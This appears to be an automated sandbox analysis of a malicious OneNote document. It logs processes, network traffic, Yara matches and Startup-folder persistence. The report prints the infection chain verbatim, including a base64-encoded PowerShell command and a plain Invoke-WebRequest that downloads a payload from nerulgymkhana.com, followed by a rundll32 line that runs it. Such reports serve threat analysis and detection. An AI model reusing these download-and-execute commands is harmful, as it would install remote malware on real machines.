Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown

DNS traffic detected: queries for: nerulgymkhana.com

Source: global traffic

HTTP traffic detected: GET /CCoN/01.gif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: nerulgymkhana.comConnection: Keep-Alive

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Yara signature match

Source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Original.one
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind	Jump to behavior

Source: Send to OneNote.lnk.0.dr

LNK file: ..\..\..\..\..\..\..\..\..\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6124:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE	Mutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_01

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File created: C:\Users\user\Documents\{9BFEE3CF-0266-4079-BAB7-95B53E3DF5E2}

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Local\Temp\{5CEEC737-82ED-44D3-8D7A-3C6E23D0875D} - OProcSessId.dat

Jump to behavior

Source: classification engine

Classification label: mal64.expl.evad.winONE@14/326@1/1

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))			Jump to behavior

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3232			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7274			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1504	Thread sleep count: 3232 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1324	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4648	Thread sleep count: 7274 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4872	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
